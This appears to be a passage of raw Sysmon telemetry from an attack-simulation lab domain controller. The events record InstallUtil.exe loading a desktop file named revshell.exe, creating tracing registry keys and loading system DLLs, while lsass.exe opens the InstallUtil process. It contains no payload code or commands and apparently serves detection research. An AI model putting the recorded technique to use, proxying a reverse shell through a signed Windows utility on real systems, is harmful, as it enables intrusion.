17:34:10.855{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASMANCS\EnableConsoleTracingDWORD (0x00000000) 13241300x800000000000000057604861Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 17:34:10.855{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASMANCS\EnableAutoFileTracingDWORD (0x00000000) 13241300x800000000000000057604860Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 17:34:10.855{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASMANCS\EnableFileTracingDWORD (0x00000000) 12241200x800000000000000057604859Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 17:34:10.855{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASMANCS 12241200x800000000000000057604858Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 17:34:10.855{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Tracing 734700x800000000000000057604857Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.855{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\mswsock.dll10.0.14393.3659 (rs1_release_1.200410-1813)Microsoft Windows Sockets 2.0 Service ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationmswsock.dllMD5=F18662FD1BCB04019CA35313C7BD1AB0,SHA256=44968455D3EEA914958BF90A83BA9311E9311676C32D8D46BB6109DF655738A4trueMicrosoft WindowsValid 734700x800000000000000057604853Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.855{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\ws2_32.dll10.0.14393.3241 (rs1_release_inmarket.190910-1801)Windows Socket 2.0 32-Bit DLLMicrosoft® Windows® Operating SystemMicrosoft Corporationws2_32.dllMD5=89AC96525FB527CDF4FFDCDF657A3923,SHA256=737BC5E7586D9AB6306949B1470DB3DBE576638A010EEF7A297126BE30841C2FtrueMicrosoft WindowsValid 734700x800000000000000057604831Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.839{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\rtutils.dll10.0.14393.4583 (rs1_release.210730-1850)Routing UtilitiesMicrosoft® Windows® Operating SystemMicrosoft CorporationRTUTILS.DLLMD5=F0D85F4CBD8049F72AF55A33E4F7FB7A,SHA256=3DE17F0036CB694E4DCBB24AB3AF00FDD1D1D153678341E2D9F9DBCD7A862F85trueMicrosoft WindowsValid 13241300x800000000000000057604821Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 17:34:10.839{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASAPI32\FileDirectory%%windir%%\tracing 13241300x800000000000000057604819Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 17:34:10.839{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASAPI32\MaxFileSizeDWORD (0x00100000) 13241300x800000000000000057604817Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 17:34:10.839{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASAPI32\ConsoleTracingMaskDWORD (0xffff0000) 13241300x800000000000000057604815Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 17:34:10.839{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASAPI32\FileTracingMaskDWORD (0xffff0000) 734700x800000000000000057604814Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.839{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\rasman.dll10.0.14393.0 (rs1_release.160715-1616)Remote Access Connection ManagerMicrosoft® Windows® Operating SystemMicrosoft CorporationRasman.dllMD5=5FA2F260361FC794573481F9EC54B03F,SHA256=58EE3CD71D7C6E004F4F99655C4BA715DF3A1F0305A2EC08F8662739AE5D97DBtrueMicrosoft WindowsValid 13241300x800000000000000057604812Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 17:34:10.839{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASAPI32\EnableConsoleTracingDWORD (0x00000000) 13241300x800000000000000057604811Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 17:34:10.839{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASAPI32\EnableAutoFileTracingDWORD (0x00000000) 13241300x800000000000000057604810Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 17:34:10.839{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASAPI32\EnableFileTracingDWORD (0x00000000) 12241200x800000000000000057604808Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 17:34:10.839{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Tracing\InstallUtil_RASAPI32 12241200x800000000000000057604805Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 17:34:10.839{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Tracing 13241300x800000000000000057604803Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 17:34:10.839{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Tracing\EnableConsoleTracingDWORD (0x00000000) 12241200x800000000000000057604801Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 17:34:10.839{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKLM\SOFTWARE\WOW6432Node\Microsoft\Tracing 734700x800000000000000057604798Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.824{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\rasapi32.dll10.0.14393.4283 (rs1_release.210303-1802)Remote Access APIMicrosoft® Windows® Operating SystemMicrosoft Corporationrasapi32.dllMD5=AF871935624629AA6B8DE455E8FB6487,SHA256=1C68A46D61720D2ACE4B1A31AF289CA50FF0FF00120401D209630A8AE970C98AtrueMicrosoft WindowsValid 734700x800000000000000057604787Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.808{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\psapi.dll10.0.14393.0 (rs1_release.160715-1616)Process Status HelperMicrosoft® Windows® Operating SystemMicrosoft CorporationPSAPIMD5=7B73FC5AD82AF0FB84212106455E0D48,SHA256=CF6A2C746B3A9B9294A41DE686ED35FC99BB6A8ABEA7DC6A81D15C67613B98D6trueMicrosoft WindowsValid 11241100x800000000000000057604784Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.761{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Users\Administrator\Desktop\revshell.InstallLog2021-11-12 17:34:10.761 734700x800000000000000057604783Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.761{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\System.Runteb92aa12#\ca3f8925ea2e2c087b39a31868d01790\System.Runtime.Serialization.ni.dll4.8.4261.0 built by: NET48REL1LAST_BSystem.Runtime.Serialization.dllMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Runtime.Serialization.dllMD5=D852391DF1D1D0ABD8DC0B947CDED66C,SHA256=B7B29E7192EE074DDF8F08F53E074813B0F2578F1464559E7359F1855ECEA751false-Unavailable 11241100x800000000000000057604782Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.699{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Users\Administrator\Desktop\InstallUtil.InstallLog2021-11-12 17:34:10.699 734700x800000000000000057604781Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.699{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\rsaenh.dll10.0.14393.4467 (rs1_release.210604-1844)Microsoft Enhanced Cryptographic ProviderMicrosoft® Windows® Operating SystemMicrosoft Corporationrsaenh.dllMD5=857A10F193FD44C58B11C90F04C4E62D,SHA256=33AB6056C7DED486E75E1D410233354A8BC326E4ABE95DF5566F68283014587BtrueMicrosoft WindowsValid 734700x800000000000000057604780Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.699{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\cryptsp.dll10.0.14393.2457 (rs1_release_inmarket.180822-1743)Cryptographic Service Provider APIMicrosoft® Windows® Operating SystemMicrosoft Corporationcryptsp.dllMD5=940907E5BEF86AF8B1D4C6FF2A98061E,SHA256=6F87C4B18D0A22A7A01C3F2176A18229B78106C9A7FC3F878892F0FD9706040CtrueMicrosoft WindowsValid 734700x800000000000000057604779Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.699{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\bcrypt.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Cryptographic Primitives Library (Wow64)Microsoft® Windows® Operating SystemMicrosoft Corporationbcrypt.dllMD5=80F9B9D2B1258D35F129D9210DC9CE20,SHA256=9653E29AA9499123EBFA49C4BA69E345F8A10029B00B790946DDFE040436EF6DtrueMicrosoft WindowsValid 734700x800000000000000057604778Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.699{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\cfgmgr32.dll10.0.14393.0 (rs1_release.160715-1616)Configuration Manager DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationCFGMGR32.DLLMD5=90A1CD387F9CB30F86D34B88BFCD83A1,SHA256=5F6CE9777CDC7B0A0E98C90709C41C379415DBA654A39B332BB683A7F2B86E97trueMicrosoft WindowsValid 734700x800000000000000057604777Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.699{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\shell32.dll10.0.14393.4583 (rs1_release.210730-1850)Windows Shell Common DllMicrosoft® Windows® Operating SystemMicrosoft CorporationSHELL32.DLLMD5=B745CDE6791890C571B08D4E29D9174E,SHA256=08B93AC421A1DA6CC4F0FE683F10C3B7679A42395854BB54CB63B5DFD5BF58BEtrueMicrosoft WindowsValid 734700x800000000000000057604774Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.527{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\d7dcf93739e68a3657fd4721d04b5128\System.Xml.ni.dll4.8.3761.0 built by: NET48REL1.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Xml.dllMD5=812235F8AF7F9B9495E7D163A2DB8063,SHA256=AD041BC02D6734E91C11C784E865D883262E1A2BCBFAE514481A12A660926234false-Unavailable 734700x800000000000000057604768Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.449{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\caff85b7b9f3e4e5d064c8b38b4810fb\System.Configuration.ni.dll4.8.4190.0 built by: NET48REL1LAST_BSystem.Configuration.dllMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Configuration.dllMD5=A3B9CCA07ABA1E54B449101B4E4C1AC2,SHA256=377CFCA37B00153D96F4AF6804FAA8CD4BA76C8FAEEE4A11D23D21E9560C14C7false-Unavailable 734700x800000000000000057604767Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.449{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\7a31f084b842deabeeea41728f172462\System.Core.ni.dll4.8.4395.0 built by: NET48REL1LAST_B.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Core.dllMD5=3A31931D0C2ED79A7D5DAA5EFFF0F6E7,SHA256=5941CBC9C68A2416AB0513002DC388760D7956E487C50BFC5CE2103FB9B89939false-Unavailable 734700x800000000000000057604766Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.371{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\profapi.dll10.0.14393.0 (rs1_release.160715-1616)User Profile Basic APIMicrosoft® Windows® Operating SystemMicrosoft CorporationPROFAPI.DLLMD5=CA6447DDCA724F0C5C0CAFDE184EFE64,SHA256=F9664337B60A332571FCA81CC3E6DD194DCE20C8546980FD283CA892D0CC873CtrueMicrosoft WindowsValid 734700x800000000000000057604765Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.355{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\powrprof.dll10.0.14393.0 (rs1_release.160715-1616)Power Profile Helper DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationPOWRPROF.DLLMD5=A6F22CA344FD1B7D75D49ECC718693C8,SHA256=C7787F59263B7D5246B931531AB4DC4C430E1BF8260775B7A751D4994A5D3489trueMicrosoft WindowsValid 734700x800000000000000057604764Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.355{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\windows.storage.dll10.0.14393.4583 (rs1_release.210730-1850)Microsoft WinRT Storage APIMicrosoft® Windows® Operating SystemMicrosoft CorporationWindows.Storage.dllMD5=4937BBA430F4AEEC4D0DC03A200348C3,SHA256=CDA95E98B9D37602AD11B97FDBF7BDDD2F79170CA5E140EB9D2A1B04E94E037FtrueMicrosoft WindowsValid 13241300x800000000000000057604763Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 17:34:10.308{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetectDWORD (0x00000000) 13241300x800000000000000057604762Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 17:34:10.308{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranetDWORD (0x00000000) 13241300x800000000000000057604761Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 17:34:10.308{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetectDWORD (0x00000000) 13241300x800000000000000057604760Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-SetValue2021-11-12 17:34:10.308{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\UNCAsIntranetDWORD (0x00000000) 10341000x800000000000000057604759Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.308{8B6011A9-886B-6164-0B00-00000000F101}6486664C:\Windows\system32\lsass.exe{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe0x1478C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\lsasrv.dll+24be7|C:\Windows\system32\lsasrv.dll+25d2d|C:\Windows\system32\lsasrv.dll+24a65|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x800000000000000057604758Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.308{8B6011A9-886B-6164-0B00-00000000F101}6486664C:\Windows\system32\lsass.exe{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe0x1000C:\Windows\SYSTEM32\ntdll.dll+a6cc4|C:\Windows\System32\RPCRT4.dll+67d2f|C:\Windows\system32\lsasrv.dll+249ad|C:\Windows\SYSTEM32\SspiSrv.dll+11a2|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+22b4b|C:\Windows\System32\RPCRT4.dll+653fa|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 12241200x800000000000000057604757Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-CreateKey2021-11-12 17:34:10.308{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeHKU\S-1-5-21-3946589728-3102711660-3528854901-500\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap 734700x800000000000000057604756Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.308{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\iertutil.dll11.00.14393.4467 (rs1_release.210604-1844)Run time utility for Internet ExplorerInternet ExplorerMicrosoft CorporationIeRtUtil.dllMD5=294BC43051C27ADB96A957A6FB9448BE,SHA256=9564D3F69345F9883161007F2E26298FD377B023D1D46C0AAE9821B4B26A74B3trueMicrosoft WindowsValid 734700x800000000000000057604755Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.292{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\SHCore.dll10.0.14393.4169 (rs1_release.210107-1130)SHCOREMicrosoft® Windows® Operating SystemMicrosoft CorporationSHCORE.dllMD5=E3851CE4A433475612CB0E1552A733E3,SHA256=F391BAA7AFF5734842737FC1B4C58856BA5E409A7B97C037995F0F26150A85FAtrueMicrosoft WindowsValid 734700x800000000000000057604754Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.292{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\srvcli.dll10.0.14393.0 (rs1_release.160715-1616)Server Service Client DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationSRVCLI.DLLMD5=DDB56B83B18735F13FD1CBEF877E9DB0,SHA256=C5EF7185888F971CFA486B64D71514512C1CCBAB8C5A1D8610CAE54476407126trueMicrosoft WindowsValid 734700x800000000000000057604753Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.292{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\netutils.dll10.0.14393.0 (rs1_release.160715-1616)Net Win32 API Helpers DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationNETUTILS.DLLMD5=A612555310B7F2A688FA57C7C10615BC,SHA256=028B8BA6A6CF74776C8E4F7485BB7973DE25242F292F837D78AB9CFCC3E8AC90trueMicrosoft WindowsValid 734700x800000000000000057604752Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.292{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\urlmon.dll11.00.14393.4530 (rs1_release.210705-0736)OLE32 Extensions for Win32Internet ExplorerMicrosoft CorporationUrlMon.dllMD5=57F1700836CDEBA98A7CF770A15A9CF6,SHA256=781F8901F292ED968270E4605154B3B794BB3770EA7C751D94B6F3B21A5EB1C4trueMicrosoft WindowsValid 734700x800000000000000057604751Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.277{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Users\Administrator\Desktop\revshell.exe0.0.0.0 --revshell.exeMD5=3596D37E19124BBDF4E20200262B0622,SHA256=AEB12FE796560074C42A7B07D923C00AD42DE4911F09E691CF47E9A36915400Cfalse-Unavailable 734700x800000000000000057604750Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.277{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Users\Administrator\Desktop\revshell.exe0.0.0.0 --revshell.exeMD5=3596D37E19124BBDF4E20200262B0622,SHA256=AEB12FE796560074C42A7B07D923C00AD42DE4911F09E691CF47E9A36915400Cfalse-Unavailable 734700x800000000000000057604747Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.261{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\System.Confe64a9051#\601bda4ba29a8d6b7b125b94c2697c8b\System.Configuration.Install.ni.dll4.8.3761.0 built by: NET48REL1.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.Configuration.Install.dllMD5=7372BB83C92065CC175F5B104E9A505D,SHA256=56381C9335A77E1478F8F27DBB70D877FD443C41210E6F6D6E34FFDB3E5DE463false-Unavailable 734700x800000000000000057604746Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.261{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\assembly\NativeImages_v4.0.30319_32\System\2c8d66b5ef1d563cf9010bf4428ff9d2\System.ni.dll4.8.4380.0 built by: NET48REL1LAST_B.NET FrameworkMicrosoft® .NET FrameworkMicrosoft CorporationSystem.dllMD5=88C6A31917BA9F2506E523DA037CC8DF,SHA256=15CD43739560489AEC0A752ACF5403A467319AC8E978DE279C702C74E792C5F2false-Unavailable 734700x800000000000000057604745Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.261{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\msvcp_win.dll10.0.14393.2999 (rs1_release_inmarket.190520-1518)Microsoft® C Runtime LibraryMicrosoft® Windows® Operating SystemMicrosoft Corporationmsvcp_win.dllMD5=7BC54AA66588A3DF7B1448A4493C6663,SHA256=9CB1BA7C092164DAA14E21454606905E294D137AD72158F92A666077D7CF1946trueMicrosoft WindowsValid 734700x800000000000000057604744Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.261{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\SysWOW64\oleaut32.dll10.0.14393.4402 (rs1_release.210426-1725)OLEAUT32.DLLMicrosoft® Windows® Operating SystemMicrosoft CorporationOLEAUT32.DLLMD5=0D885953D657434CA5015545A364BDB9,SHA256=1D29921E136F84B4CA9F1EBD646CFFF4571EA805A6CC5BC1F7C7784CC3246088trueMicrosoft WindowsValid 734700x800000000000000057604743Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 17:34:10.261{8B6011A9-A592-618E-F5FC-04000000F101}216C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\clrjit.dll4.8.4410.0 built by: NET48REL1LAST_BMicrosoft .NET Runtime Just-In-Time CompilerMicrosoft® .NET FrameworkMicrosoft Corporationclrjit.dllMD5=057E8B1C10BCFC56E238FFC109C7A01E,SHA256=E164F2C2B70575ECF5C8B266E84A6C3236C18A6F09AE09A99F59AC6B0AEAF8E8trueMicrosoft CorporationValid 734700x800000000000000057604742Microsoft-Windows-Sysmon/Operationalwin-dc-469.attackrange.local-2021-11-12 